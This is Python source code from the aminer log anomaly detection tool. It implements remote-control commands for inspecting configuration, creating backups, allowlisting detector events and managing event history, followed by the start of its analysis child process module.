self.REMOTE_CONTROL_RESPONSE += "FAILURE: the parameters 'component_name' and 'attribute' must be of type str." return if analysis_context.get_component_by_name(component_name) is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not exist." 
return if hasattr(analysis_context.get_component_by_name(component_name), attribute): attr = getattr(analysis_context.get_component_by_name(component_name), attribute, None) if isinstance(attr, set): attr = list(attr) if hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): new_attr = self.get_all_vars(attr, ' ') if isinstance(new_attr, str): new_attr = f'"{new_attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {new_attr}' elif isinstance(attr, list): self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": [' for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): new_attr = "\n[\n " + at.__class__.__name__ + " {\n" + self.get_all_vars(at, ' ') + " }\n]" else: if isinstance(at, str): new_attr = f'"{at}"' else: new_attr = str(at) self.REMOTE_CONTROL_RESPONSE += f"{new_attr}, " self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.rstrip(", ") self.REMOTE_CONTROL_RESPONSE += "]" else: if attr is None or isinstance(attr, (str, bool)): attr = f'"{attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {attr}' self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace('"False"', 'false').replace('"True"', 'true').replace( '"None"', 'null') else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not have an attribute named '{attribute}'." def print_current_config(self, analysis_context): """ Print the entire aminer config. @param analysis_context the analysis context of the aminer. 
""" for config_property in analysis_context.aminer_config.config_properties: if isinstance(analysis_context.aminer_config.config_properties[config_property], str): self.REMOTE_CONTROL_RESPONSE += f'"{config_property}": ' \ f'"{analysis_context.aminer_config.config_properties[config_property]}",\n' else: self.REMOTE_CONTROL_RESPONSE += attr_str % ( config_property, analysis_context.aminer_config.config_properties[config_property]) for component_id in analysis_context.get_registered_component_ids(): self.REMOTE_CONTROL_RESPONSE += \ f'"{analysis_context.get_name_by_component(analysis_context.get_component_by_id(component_id))}": ' + '{\n' component = analysis_context.get_component_by_id(component_id) self.REMOTE_CONTROL_RESPONSE += self.get_all_vars(component, ' ') self.REMOTE_CONTROL_RESPONSE += "},\n\n" self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"').replace('"False"', 'false').replace( '"True"', 'true').replace('"None"', 'null').replace('\\"', "'").rstrip(',\n\n\n') + '\n\n' def get_all_vars(self, obj, indent): """Return all variables in string representation.""" result = '' for var in vars(obj): attr = getattr(obj, var, None) if attr is not None and isinstance(attr, (tuple, set)): attr = list(attr) if attr is not None and hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): result += indent + '"%s": {\n' % var + self.get_all_vars(attr, indent + ' ') + indent + "},\n" elif isinstance(attr, list): for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): result += indent + '"%s": {\n' % var + indent + ' "' + at.__class__.__name__ + \ '": {\n' + self.get_all_vars(at, indent + ' ') + indent + ' ' + "}\n" + indent + '},\n' else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) break else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) return result.rstrip(',\n') + '\n' @staticmethod def isinstance_aminer_class(obj): """Test if an object is of an instance of a 
aminer class.""" class_list = [ aminer.analysis.AtomFilters.SubhandlerFilter, aminer.analysis.AtomFilters.MatchPathFilter, aminer.analysis.AtomFilters.MatchValueFilter, aminer.analysis.HistogramAnalysis.LinearNumericBinDefinition, aminer.analysis.HistogramAnalysis.BinDefinition, aminer.analysis.HistogramAnalysis.ModuloTimeBinDefinition, aminer.analysis.Rules.MatchAction, aminer.analysis.Rules.MatchRule, aminer.analysis.HistogramAnalysis.HistogramData, aminer.analysis.TimeCorrelationViolationDetector.CorrelationRule, aminer.analysis.TimeCorrelationDetector.CorrelationFeature, aminer.events.EventInterfaces.EventHandlerInterface, aminer.util.History.ObjectHistory] for c in class_list: if isinstance(obj, c): return True return False def save_current_config(self, analysis_context, destination_file): """ Save the current live config into a file. @param analysis_context the analysis context of the aminer. @param destination_file the path to the file in which the config is saved. """ if re.match("^(/[^/ ]*)+/?$", destination_file) is not None: msg = AminerConfig.save_config(analysis_context, destination_file) else: msg = f"Exception: {destination_file} is not a valid filename!" 
self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def persist_all(self): """Persist all data by calling the function in PersistenceUtil.""" PersistenceUtil.persist_all() self.REMOTE_CONTROL_RESPONSE = 'OK' logging.getLogger(DEBUG_LOG_NAME).info('Called persist_all() via remote control.') def create_backup(self, analysis_context): """Create a backup with the current datetime string.""" backup_time = time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = analysis_context.aminer_config.config_properties[KEY_PERSISTENCE_DIR] persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) msg = f"Created backup {backup_time_str}" self.REMOTE_CONTROL_RESPONSE = f"Created backup {backup_time_str}" logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_backups(self, analysis_context): """List all available backups from the persistence directory.""" persistence_dir = analysis_context.aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) for _dirpath, dirnames, _filenames in os.walk(os.path.join(persistence_dir, 'backup')): self.REMOTE_CONTROL_RESPONSE = f'"backups": {dirnames}' break self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"') def allowlist_event_in_component(self, analysis_context, component_name, event_data, allowlisting_data=None): """ Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param allowlisting_data this data is passed on into the allowlist_event method. 
""" component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in [ "EnhancedNewMatchPathValueComboDetector", "MissingMatchPathValueDetector", "NewMatchPathDetector", "NewMatchPathValueComboDetector", "NewMatchIdValueComboDetector", "EventCorrelationDetector", "NewMatchPathValueDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support allowlisting! Only the following classes " \ f"support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector," \ f" NewMatchIdValueComboDetector, NewMatchPathValueComboDetector, NewMatchPathValueDetector and EventCorrelationDetector." return try: msg = component.allowlist_event(f"Analysis.{component.__class__.__name__}", event_data, allowlisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def blocklist_event_in_component(self, analysis_context, component_name, event_data, blocklisting_data=None): """ Blocklists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param blocklisting_data this data is passed on into the blocklist_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" 
return if component.__class__.__name__ not in ["EventCorrelationDetector"]: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component class '{component.__class__.__name__}' does not support blocklisting!" \ f" Only the following classes support blocklisting: EventCorrelationDetector." return try: msg = component.blocklist_event(f"Analysis.{component.__class__.__name__}", event_data, blocklisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def print_persistency_event_in_component(self, analysis_context, component_name, event_data): """ Prints the persistency specified in event_data of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the print_persistency_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in ["EventFrequencyDetector", "MinimalTransitionTimeDetector", "PathValueTimeIntervalDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the print_persistency_event! Only the " \ f"following classes support it: EventFrequencyDetector, MinimalTransitionTimeDetector and PathValueTimeIntervalDetector." 
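return
        try:
            msg = component.print_persistence_event(f"Analysis.{component.__class__.__name__}", event_data)
            self.REMOTE_CONTROL_RESPONSE += msg
            logging.getLogger(DEBUG_LOG_NAME).info(msg)
        # skipcq: PYL-W0703
        except Exception as e:
            self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e)

    def add_to_persistency_event_in_component(self, analysis_context, component_name, event_data):
        """
        Add information specified in event_data to the persistency of component_name.
        The outcome (success message, failure reason or the repr of a raised exception) is appended to
        self.REMOTE_CONTROL_RESPONSE; nothing is returned.
        @param analysis_context the analysis context of the aminer.
        @param component_name the name under which the component is registered in the analysis_context.
        @param event_data the event_data for the add_to_persistence_event method of the component.
        """
        component = analysis_context.get_component_by_name(component_name)
        if component is None:
            # Report the requested name, not the (None) lookup result.
            self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component_name}' does not exist!"
            return
        # Dispatch is by exact class name, so subclasses of the listed detectors are rejected here as well.
        if component.__class__.__name__ not in ["NewMatchPathValueComboDetector", "MinimalTransitionTimeDetector", "PathValueTimeIntervalDetector"]:
            self.REMOTE_CONTROL_RESPONSE += \
                f"FAILURE: component class '{component.__class__.__name__}' does not support the add_to_persistency_event! Only the " \
                f"following classes support it: NewMatchPathValueComboDetector, MinimalTransitionTimeDetector and" \
                f" PathValueTimeIntervalDetector."
            return
        try:
            msg = component.add_to_persistence_event(f"Analysis.{component.__class__.__name__}", event_data)
            self.REMOTE_CONTROL_RESPONSE += msg
            logging.getLogger(DEBUG_LOG_NAME).info(msg)
        # Any error raised by the component is reported to the remote control client instead of aborting the request.
        # skipcq: PYL-W0703
        except Exception as e:
            self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e)

    def remove_from_persistency_event_in_component(self, analysis_context, component_name, event_data):
        """
        Remove information specified in event_data from the persistency of component_name.
        The outcome (success message, failure reason or the repr of a raised exception) is appended to
        self.REMOTE_CONTROL_RESPONSE; nothing is returned.
        @param analysis_context the analysis context of the aminer.
        @param component_name the name under which the component is registered in the analysis_context.
        @param event_data the event_data for the remove_from_persistence_event method of the component.
        """
        component = analysis_context.get_component_by_name(component_name)
        if component is None:
            # Report the requested name, not the (None) lookup result.
            self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component_name}' does not exist!"
            return
        # Dispatch is by exact class name, so subclasses of the listed detectors are rejected here as well.
        if component.__class__.__name__ not in ["MinimalTransitionTimeDetector", "PathValueTimeIntervalDetector"]:
            self.REMOTE_CONTROL_RESPONSE += \
                f"FAILURE: component class '{component.__class__.__name__}' does not support the remove_from_persistency_event! Only the " \
                f"following classes support it: MinimalTransitionTimeDetector and PathValueTimeIntervalDetector."
            return
        try:
            msg = component.remove_from_persistence_event(f"Analysis.{component.__class__.__name__}", event_data)
            self.REMOTE_CONTROL_RESPONSE += msg
            logging.getLogger(DEBUG_LOG_NAME).info(msg)
        # Any error raised by the component is reported to the remote control client instead of aborting the request.
        # skipcq: PYL-W0703
        except Exception as e:
            self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e)

    def add_handler_to_atom_filter_and_register_analysis_component(self, analysis_context, atom_handler, component, component_name):
        """
        Add a new component to the analysis_context.
        @param analysis_context the analysis context of the aminer.
        @param atom_handler the registered name of the atom_handler component to add the new component to.
        @param component the component to be added.
        @param component_name the name to be registered in the analysis_context.
        """
        atom_filter = analysis_context.get_component_by_name(atom_handler)
        if atom_filter is None:
            self.REMOTE_CONTROL_RESPONSE += f"FAILURE: atom_handler '{atom_handler}' does not exist!"
            return
        if analysis_context.get_component_by_name(component_name) is not None:
            self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component with same name already registered! ({component_name})"
            return
        if not isinstance(component, AtomHandlerInterface):
            self.REMOTE_CONTROL_RESPONSE += "FAILURE: 'component' must implement the AtomHandlerInterface!"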
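return
        atom_filter.add_handler(component)
        analysis_context.register_component(component, component_name)
        msg = f"Component '{component_name}' added to '{atom_handler}' successfully."
        self.REMOTE_CONTROL_RESPONSE += msg
        logging.getLogger(DEBUG_LOG_NAME).info(msg)

    def dump_events_from_history(self, analysis_context, history_component_name, dump_event_id):
        """
        Detailed print of a specific event from the history.
        The first history entry whose id equals dump_event_id is rendered into self.REMOTE_CONTROL_RESPONSE;
        if none matches, the response is 'FAIL: not found'. Nothing is returned.
        @param analysis_context the analysis context of the aminer.
        @param history_component_name the registered name of the history component.
        @param dump_event_id a numeric id of the event to be printed.
        """
        self.REMOTE_CONTROL_RESPONSE = None
        history_handler = analysis_context.get_component_by_name(history_component_name)
        if history_handler is None:
            self.REMOTE_CONTROL_RESPONSE = component_not_found
        else:
            history_data = history_handler.get_history()
            result_string = 'FAIL: not found'
            # Iterate over the entries directly; indexing history_data with the (index, entry) tuples
            # produced by enumerate() would raise a TypeError.
            for event_id, event_type, event_message, sorted_log_lines, event_data, _event_source in history_data:
                if event_id != dump_event_id:
                    continue
                append_log_lines_flag = True
                result_string = f"OK\nEvent {event_id}: {event_message} ({event_type})"
                if event_type == 'Analysis.NewMatchPathDetector':
                    result_string += f"\n Logline: {sorted_log_lines[0]}"
                elif event_type == 'Analysis.NewMatchPathValueComboDetector':
                    result_string += '\nParser match:\n' + event_data[0].parser_match.matchElement.annotate_match(' ')
                elif event_type == 'Analysis.AllowlistViolationDetector':
                    result_string += '\nParser match:\n' + event_data.parser_match.matchElement.annotate_match(' ')
                elif event_type == 'ParserModel.UnparsedData':
                    result_string += f"\n Unparsed line: {sorted_log_lines[0]}"
                    # The unparsed line was already printed above, do not repeat it as log lines.
                    append_log_lines_flag = False
                else:
                    result_string += f"\n Data: {str(event_data)}"
                if append_log_lines_flag and (sorted_log_lines is not None) and (len(sorted_log_lines) != 0):
                    result_string += '\n Log lines:\n %s' % '\n '.join(sorted_log_lines)
                # Only the first matching event is dumped.
                break
            self.REMOTE_CONTROL_RESPONSE = result_string
            logging.getLogger(DEBUG_LOG_NAME).info(result_string)

    def ignore_events_from_history(self, analysis_context, history_component_name, event_ids):
        """
        Ignore one or multiple specific events from the history.
        These ignores do not affect the components itself; matching entries are only removed from the history
        list in place. The number of removed entries is reported in self.REMOTE_CONTROL_RESPONSE.
        @param analysis_context the analysis context of the aminer.
        @param history_component_name the registered name of the history component.
        @param event_ids a list of numeric ids of the events to be ignored; a two-element list [low, high]
        inside it is treated as an inclusive id range.
        """
        history_handler = analysis_context.get_component_by_name(history_component_name)
        if history_handler is None:
            self.REMOTE_CONTROL_RESPONSE = component_not_found
            return
        history_data = history_handler.get_history()
        # Collect the range specifications; plain ids are matched directly below.
        id_spec_list = []
        for element in event_ids:
            if isinstance(element, list):
                id_spec_list.append(element)
        delete_count = 0
        event_pos = 0
        while event_pos < len(history_data):
            event_id, _event_type, _event_message, _sorted_log_lines, _event_data, _event_source = history_data[event_pos]
            may_delete_flag = False
            if event_id in event_ids:
                may_delete_flag = True
            else:
                for id_range in id_spec_list:
                    if id_range[0] <= event_id <= id_range[1]:
                        may_delete_flag = True
            if may_delete_flag:
                # Slice assignment keeps the list object shared with the history component.
                history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:]
                delete_count += 1
            else:
                event_pos += 1
        msg = f"OK\n{delete_count} elements ignored"
        self.REMOTE_CONTROL_RESPONSE = msg
        logging.getLogger(DEBUG_LOG_NAME).info(msg)

    def list_events_from_history(self, analysis_context, history_component_name, max_event_count=None):
        """
        List the latest events of a specific history component.
        @param analysis_context the analysis context of the aminer.
        @param history_component_name the registered name of the history component.
        @param max_event_count the number of the newest events to be listed.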
""" history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() max_events = len(history_data) if max_event_count is None or max_events < max_event_count: max_event_count = max_events result_string = 'OK' for event_id, _event_type, event_message, sorted_log_lines, _event_data, _event_source in history_data[:max_event_count]: result_string += f"\nEvent {event_id}: {event_message}; Log data: {repr(sorted_log_lines)}"[:240] self.REMOTE_CONTROL_RESPONSE = result_string def allowlist_events_from_history(self, analysis_context, history_component_name, id_spec_list, allowlisting_data=None): """ Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param id_spec_list a list of numeric ids of the events to be allowlisted. @param allowlisting_data this data is passed on into the allowlist_event method. """ from aminer.events.EventInterfaces import EventSourceInterface history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return if id_spec_list is None or not isinstance(id_spec_list, list): self.REMOTE_CONTROL_RESPONSE = \ 'Request requires remote_control_data with ID specification list and optional allowlisting information.' 
return history_data = history_handler.get_history() result_string = '' lookup_count = 0 event_pos = 0 while event_pos < len(history_data): event_id, event_type, _event_message, sorted_log_lines, event_data, event_source = history_data[event_pos] found_flag = False if event_id in id_spec_list: found_flag = True else: for id_range in id_spec_list: if isinstance(id_range, list) and (id_range[0] <= event_id <= id_range[1]): found_flag = True if not found_flag: event_pos += 1 continue lookup_count += 1 allowlisted_flag = False if isinstance(event_source, EventSourceInterface): # This should be the default for all detectors. try: message = event_source.allowlist_event( event_type, sorted_log_lines, event_data, allowlisting_data) result_string += f"OK {event_id}: {message}\n" logging.getLogger(DEBUG_LOG_NAME).info(result_string) allowlisted_flag = True except NotImplementedError: result_string += f"FAIL {event_id}: component does not support allowlisting." # skipcq: PYL-W0703 except Exception as wl_exception: result_string += f"FAIL {event_id}: {str(wl_exception)}\n" elif event_type == 'Analysis.AllowlistViolationDetector': result_string += f"FAIL {event_id}: No automatic modification of allowlist rules, manual changes required\n" allowlisted_flag = True elif event_type == 'ParserModel.UnparsedData': result_string += f"FAIL {event_id}: No automatic modification of parsers yet\n" else: result_string += f"FAIL {event_id}: Unsupported event type {event_type}\n" if allowlisted_flag: # Clear the allowlisted event. 
history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:]
            else:
                event_pos += 1
        if lookup_count == 0:
            result_string = 'FAIL: Not a single event ID from specification found'
        self.REMOTE_CONTROL_RESPONSE = result_string

    def reopen_event_handler_streams(self, analysis_context):
        """
        Reopen all StreamPrinterEventHandler streams for log rotation.
        Delegates to AnalysisContext.close_event_handler_streams with reopen=True; the reopen mode used there
        decides whether the existing output file is kept or truncated, so this should only be triggered after
        the output file has actually been rotated.
        @param analysis_context the analysis context of the aminer.
        """
        analysis_context.close_event_handler_streams(analysis_context.atomizer_factory.event_handler_list, reopen=True)
        msg = "Reopened all StreamPrinterEventHandler streams."
        self.REMOTE_CONTROL_RESPONSE = msg
        logging.getLogger(DEBUG_LOG_NAME).info(msg)


def _repr_recursive(attr):
    """
    Return a JSON-like representation of a config attribute with the types list, dict, set or tuple.
    The output is built from str() of Python containers plus textual replacements, not from a JSON
    encoder; values that themselves contain quotes or brackets may therefore yield text that is not
    valid JSON. NOTE(review): consider json.dumps if strict JSON is required by the consumer.
    @param attr the attribute to be represented.
    @return None for None, the value itself for int/str/float, the decoded text for bytes, a string
    for containers, and the class name for any other type.
    """
    if attr is None:
        return None
    # type(AminerConfig) is the module type, so module references are rendered via str().
    if isinstance(attr, (bool, type(AminerConfig))):
        rep = str(attr)
    elif isinstance(attr, (int, str, float)):
        rep = attr
    elif isinstance(attr, bytes):
        rep = attr.decode()
    elif isinstance(attr, (list, tuple, set)):
        if isinstance(attr, (tuple, set)):
            attr = list(attr)
        # NOTE(review): when attr is a list this rewrites the caller's list in place; tuples and sets are
        # copied above and are not affected.
        for i, a in enumerate(attr):
            attr[i] = _repr_recursive(a)
        rep = str(attr).replace('\\"', "'").replace("'[", "[").replace("]'", "]").replace("'", '"').replace('"False"', 'false').replace(
            '"True"', 'true').replace('"None"', 'null')
    elif isinstance(attr, dict):
        new_attr = {}
        for key in attr.keys():
            # NOTE(review): the stored value is derived from the key, not from attr[key]; the dict's
            # values never reach the output. Confirm whether this is intended.
            value = _repr_recursive(key)
            if isinstance(value, str):
                value = value.replace('\\"', "'")
            new_attr[str(key)] = value
        # Unlike the list branch, no False/True/None to false/true/null replacement is applied here.
        rep = str(new_attr).replace("'[", "[").replace("]'", "]")
    else:
        rep = attr.__class__.__name__
    return rep


def _reformat_attr(attr):
    """
    Return a valid JSON representation of an config attribute with any type.
    If the type is list, dict, set or tuple _repr_recursive is called.
    @param attr the attribute to be represented.
""" if type(attr) in (int, str, float, bool, type(AminerConfig), type(None)): rep = str(attr) elif isinstance(attr, bytes): rep = attr.decode() elif isinstance(attr, (list, dict, set, tuple)): rep = _repr_recursive(attr) else: rep = attr.__class__.__name__ if rep.startswith("'") and rep.endswith("'") and rep.count("'") == 2: rep = rep.replace("'", '"') elif rep.strip('"').startswith("'") and rep.strip('"').endswith("'") and rep.strip('"').count("'") == 2: rep = rep.strip('"').replace("'", '"') else: rep = rep.strip('"').replace("'", '\\"') if not isinstance(attr, (list, dict, tuple, set)) and not rep.startswith('"') and not rep.isdecimal(): try: float(rep) except ValueError: # skipcq: FLK-E722 rep = f'"{rep}"' return rep logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/AnalysisChild.py000066400000000000000000001335271437606560100323230ustar00rootroot00000000000000""" This module contains classes for execution of py child process main analysis loop. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import base64 import errno import fcntl import json import os import select import socket import struct import sys import time import traceback import resource import logging from datetime import datetime import shutil from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_STAT_PERIOD,\ DEFAULT_STAT_PERIOD, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, REMOTE_CONTROL_LOG_NAME, KEY_PERSISTENCE_PERIOD,\ DEFAULT_PERSISTENCE_PERIOD from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogStream import LogStream from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import JsonUtil from aminer.AminerRemoteControlExecutionMethods import AminerRemoteControlExecutionMethods class AnalysisContext: """This class collects information about the current analysis context to access it during analysis or remote management.""" TIME_TRIGGER_CLASS_REALTIME = 1 TIME_TRIGGER_CLASS_ANALYSISTIME = 2 def __init__(self, aminer_config): self.aminer_config = aminer_config # This is the factory to create atomizers for incoming data streams and link them to the analysis pipeline. self.atomizer_factory = None # This is the current log processing and analysis time regarding the data stream being analyzed. While None, the analysis time # e.g. used to trigger components (see analysisTimeTriggeredComponents), is the same as current system time. For forensic analysis # this time has to be updated to values derived from the log data input to reflect the current log processing time, which will be in # the past and may progress much faster than real system time. self.analysis_time = None # Keep a registry of all analysis and filter configuration for later use. 
Remote control interface may then access them for # runtime reconfiguration. self.next_registry_id = 0 self.registered_components = {} # Keep also a list of components by name. self.registered_components_by_name = {} # Keep lists of components that should receive timer interrupts when real time or analysis time has elapsed. self.real_time_triggered_components = [] self.analysis_time_triggered_components = [] self.suppress_detector_list = [] def add_time_triggered_component(self, component, trigger_class=None): """Add a time-triggered component to the registry.""" if not isinstance(component, TimeTriggeredComponentInterface): msg = f"Attempting to register component of class {component.__class__.__name__} not implementing " \ f"aminer.util.TimeTriggeredComponentInterface" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if trigger_class is None: trigger_class = component.get_time_trigger_class() if trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_REALTIME: self.real_time_triggered_components.append(component) elif trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME: self.analysis_time_triggered_components.append(component) else: msg = f"Attempting to timer component for unknown class {trigger_class}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) logging.getLogger(DEBUG_LOG_NAME).debug( 'Called %s for the component %s', 'add_time_triggered_component', component.__class__.__name__) def register_component(self, component, component_name=None, register_time_trigger_class_override=None): """ Register a new component. A component implementing the TimeTriggeredComponentInterface will also be added to the appropriate lists unless registerTimeTriggerClassOverride is specified. @param component the component to be registered. @param component_name an optional name assigned to the component when registering. When no name is specified, the detector class name plus an identifier will be used. 
When a component with the same name was already registered, this will cause an error. @param register_time_trigger_class_override if not none, ignore the time trigger class supplied by the component and register it for the classes specified in the override list. Use an empty list to disable registration. """ if component_name is None: component_name = str(component.__class__.__name__) + str(self.next_registry_id) if component_name in self.registered_components_by_name: msg = 'Component with same name already registered' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if register_time_trigger_class_override is not None and not isinstance(component, TimeTriggeredComponentInterface): msg = 'Requesting override on component not implementing TimeTriggeredComponentInterface' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.registered_components[self.next_registry_id] = (component, component_name) self.next_registry_id += 1 self.registered_components_by_name[component_name] = component if isinstance(component, TimeTriggeredComponentInterface): if register_time_trigger_class_override is None: self.add_time_triggered_component(component) else: for trigger_class in register_time_trigger_class_override: self.add_time_triggered_component(component, trigger_class) logging.getLogger(DEBUG_LOG_NAME).debug( "Registered component %s with the id %d and component_name '%s'.", component.__class__.__name__, self.next_registry_id - 1, component_name) def get_registered_component_ids(self): """Get a list of currently known component IDs.""" return self.registered_components.keys() def get_component_by_id(self, id_string): """ Get a component by ID. @return None if not found. 
""" component_info = self.registered_components.get(id_string) if component_info is None: return None return component_info[0] def get_registered_component_names(self): """Get a list of currently known component names.""" return list(self.registered_components_by_name.keys()) def get_component_by_name(self, name): """ Get a component by name. @return None if not found. """ return self.registered_components_by_name.get(name) def get_name_by_component(self, component): """ Get the name of a component. @return None if not found. """ for component_name, component_iter in self.registered_components_by_name.items(): if component_iter == component: return component_name return None def get_id_by_component(self, component): """ Get the name of a component. @return None if not found. """ for component_id, component_iter in self.registered_components.items(): if component_iter[0] == component: return component_id return None def build_analysis_pipeline(self): """Create the pipeline.""" logging.getLogger(DEBUG_LOG_NAME).debug("Started with build_analysis_pipeline.") self.aminer_config.build_analysis_pipeline(self) def close_event_handler_streams(self, event_handlers, reopen=False): """Close the streams of all StreamPrinterEventHandlers.""" for event_handler in event_handlers: if isinstance(event_handler, StreamPrinterEventHandler): # Can not rotate sys.stdout. Consider using the copytruncate option of logrotate instead. 
if event_handler.stream.name in ("", ""): continue try: event_handler.stream.close() if reopen: event_handler.stream = open(event_handler.stream.name, "w+") except IOError as e: msg = f"Error when closing or opening stream with the name {event_handler.stream.name}, shutting down.\n{e}" logging.getLogger(DEBUG_LOG_NAME).critical(msg) print(msg, file=sys.stderr) sys.exit(1) elif isinstance(event_handler, JsonConverterHandler): self.close_event_handler_streams(event_handler.json_event_handlers) suspended_flag = False class AnalysisChild(TimeTriggeredComponentInterface): """ This class defines the child performing the complete analysis workflow. When splitting privileges between analysis and monitor process, this class should only be initialized within the analysis process! """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME offline_mode = False def __init__(self, program_name, aminer_config): self.program_name = program_name self.aminer_config = aminer_config self.analysis_context = AnalysisContext(aminer_config) self.run_analysis_loop_flag = True self.log_streams_by_name = {} self.persistence_file_name = build_persistence_file_name( self.analysis_context.aminer_config, self.__class__.__name__ + '/RepositioningData') self.next_persist_time = time.time() + self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.repositioning_data_dict = {} self.master_control_socket = None self.remote_control_socket = None # This dictionary provides a lookup list from file descriptor to associated object for handling the data to and from the given # descriptor. Currently supported handler objects are: # * Parent process socket # * Remote control listening socket # * LogStreams # * Remote control connections self.tracked_fds_dict = {} # Override the signal handler to allow graceful shutdown. 
def graceful_shutdown_handler(_signo, _stack_frame): """React on typical shutdown signals.""" msg = f"{program_name}: caught signal, shutting down" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).info(msg) self.run_analysis_loop_flag = False import signal signal.signal(signal.SIGHUP, graceful_shutdown_handler) signal.signal(signal.SIGINT, graceful_shutdown_handler) signal.signal(signal.SIGTERM, graceful_shutdown_handler) # Do this on at the end of the initialization to avoid having partially initialized objects inside the registry. self.analysis_context.add_time_triggered_component(self) def run_analysis(self, master_fd): """ Run the analysis thread. @param master_fd the main communication socket to the parent to receive logfile updates from the parent. @return 0 on success, e.g. normal termination via signal or 1 on error. """ # The masterControlSocket is the socket to communicate with the master process to receive commands or logstream data. Expect # the parent/child communication socket on fd 3. This also duplicates the fd, so close the old one. self.master_control_socket = socket.fromfd(master_fd, socket.AF_UNIX, socket.SOCK_DGRAM, 0) os.close(master_fd) self.tracked_fds_dict[self.master_control_socket.fileno()] = self.master_control_socket # Locate the real analysis configuration. 
